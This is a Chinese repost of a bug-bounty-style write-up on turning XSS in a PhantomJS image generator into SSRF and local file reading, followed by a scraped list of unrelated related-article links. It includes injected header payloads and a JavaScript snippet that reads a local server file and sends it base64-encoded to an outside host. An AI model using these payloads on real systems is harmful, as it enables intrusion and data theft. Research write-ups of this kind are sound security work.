骚年,看我如何把 PhantomJS 图片的 XSS 升级成 SSRF/LFR
这篇文章实在是太好了,我看了好几篇,所以极力推荐给大家
1
|
https : / / website / download?background = file .jpg & author = Brett & header = Test & text = & width = 500 & height = 500
|
1
|
https : / / website / download?background = file .jpg & author = Brett & header = " > < u > test & text = & width = 500 & height = 500
|
1
|
https : / / website / download?background = file .jpg & author = Brett & header = < iframe src = https : / / xss.buer.haus / ssrftest > < / iframe > & text = & width = 500 & height = 500
|
1
|
[ 25 / Jun / 2017 : 20 : 31 : 49 -0400 ] "GET /ssrftest HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1"
|
1
|
https : / / website / download?background = file .jpg & author = Brett & header = < img src = "x" / > & text = & width = 500 & height = 500
|
1
|
{ "message" : "Internal server error" } .
|
1
|
https : / / website / download?background = file .jpg & author = Brett & header = < img src = "x" / > & text = & width = 500 & height = 500
|
1
|
https : / / website / download?background = file .jpg & author = Brett & header = < img src = "x" / > & text = & width = 500 & height = 500
|
1
|
https : / / website / download?background = file .jpg & author = Brett & header = < img src = "xasdasdasd" / > & text = & width = 500 & height = 500
|
1
|
& header = < img src = "xasdasdasd" / >
|
1
|
& header = < img src = "xasdasdasd" https : / / xss.buer.haus / test.js "></script>')" / >
|
01
02
03
04
05
06
07
08
09
10
11
12
13
14
15
16
17
18
19
|
function reqListener ( ) {
var encoded = encodeURI ( this.responseText ) ;
var b 64 = btoa ( this.responseText ) ;
var raw = this.responseText;
document . write ( ' < iframe src = "https://xss.buer.haus/exfil?data='+b64+'" > < / iframe > ' ) ;
}
var oReq = new XMLHttpRequest ( ) ;
oReq.addEventListener ( "load" , reqListener ) ;
oReq. open ( "GET" , "file:///var/task/[redacted].html" ) ;
oReq.send ( ) ;
|
转载于:https://www.cnblogs.com/ichunqiu/p/7204089.html
骚年,看我如何把 PhantomJS 图片的 XSS 升级成 SSRF/LFR相关推荐
- rpgmvp图片怎么看_拼多多商城图片和视频下载不了怎么办,看这里。。。。
最近拼多多商城规则变动,很多软件都不能下载拼多多商城图片和视频.小编今天试了一种新的方法可以同时下载商城里的图片和视频.现在一起来看看是如何操作的吧. 准备软件:下图高手高级版软件 实例操作步骤 1. ...
- base64格式的图片数据如何转成图片
base64格式的图片数据如何转成图片 一.总结 一句话总结:不仅要去掉前面的格式串,还需要base64_decode()解码才行. 1 // $base_img是获取到前端传递的值 2 $base_ ...
- 小程序源码:修复图片音频全新升级带特效喝酒神器小游戏微信小程序
这是一款全新升级带特效喝酒神器小游戏微信小程序源码 小编发现很多喝酒神器小程序都不带特效和音效的 感觉差了那么一点意思而且感觉也不炫酷 所以小编今天给大家带来一款带特效,音效炫酷的喝酒神器 该款神器由 ...
- 图片如何进行格式转换?图片格式怎么改成jpg?
图片格式可以分为很多种,但最常用的图片格式以jpg为主.怎样进行图片转格式操作,将图片格式转换jpg?选择压缩图图片在线转换器,一键轻松将图片在线格式转换. 1.上传图片. 2.点击选择jpg格式,在 ...
- 计算机打开查看方式默认是什么样,如何更改win10系统电脑图片的查看方式 怎么将电脑图片查看方式改成缩略图...
如何更改win10系统电脑图片的查看方式 怎么将电脑图片查看方式改成缩略图 腾讯视频/爱奇艺/优酷/外卖 充值4折起 今天,小编给大家介绍更改win10系统电脑图片查看方式的方法,希望对大家有所帮助. ...
- 图片png怎么转成pdf格式?
图片png怎么转成pdf格式?相信很多上班的小伙伴们都会遇到类似的问题,需要将公司的图片宣传册等资料发送给客户,但是公司宣传册本身是一页一页的图片文件,如果这样发送了就显得很不专业或者说比较杂乱!所以 ...
- 微信小程序:修复图片音频全新升级带特效喝酒神器源码
这是一款全新升级带特效喝酒神器小游戏微信小程序源码 小编发现很多喝酒神器小程序都不带特效和音效的 感觉差了那么一点意思而且感觉也不炫酷 所以小编今天给大家带来一款带特效,音效炫酷的喝酒神器 该款神器由 ...
- 小程序源码:修复图片音频全新升级带特效喝酒神器小游戏-多玩法安装简单
这是一款全新升级带特效喝酒神器小游戏微信小程序源码 小编发现很多喝酒神器小程序都不带特效和音效的 感觉差了那么一点意思而且感觉也不炫酷 所以小编今天给大家带来一款带特效,音效炫酷的喝酒神器 该款神器由 ...
- 图片文字怎么转换成文本?可以试试这三种途径
上午收到同事发来的项目介绍,好家伙大几千字的内容全在一张长图上.其中仍有要修改的地方,看来只能先把图片文字转换成文本,再进行编辑了.有没有更快更准确的转换方法呢?这就来给各位说几种高效转换途径,如果你 ...
最新文章
- LabVIEW设置应用程序显示标签透明
- git-【五】远程仓库
- 数字图像处理基本概念
- java web 邮箱激活 与 忘记密码(重置密码)
- WinSCP无法连接linux,而secureCRT却可以
- 主席树 POJ2104
- 问道手游服务器维护,问道手游2021年5月20日维护公告_问道手游2021年5月20日更新了什么_玩游戏网...
- 将指定目录中的txt文件转化成excel文件
- 软件项目管理 2.1.项目立项
- socket(java) 搭建一个多人在线聊天室
- 光纤接头截面工艺分类
- 小程序推荐——那些好用实用的小程序(图片类、资讯类、工具类)
- css规则定义的分类,CSS规则定义英汉对照表
- Arxiv | 预测新型蛋白质间相互作用的图神经网络模型
- python 12306登录_Python 12306登陆详细分析及操作
- 她让我把电脑带回家。 -您是如何开始计算机和编程的?
- iOS推送证书显示“此证书不受信任”
- MySQL DQL分组查询、条件查询、子查询
- 计算几何基础【用图来助你理解几何算法】
- C语言变长数组(柔性数组)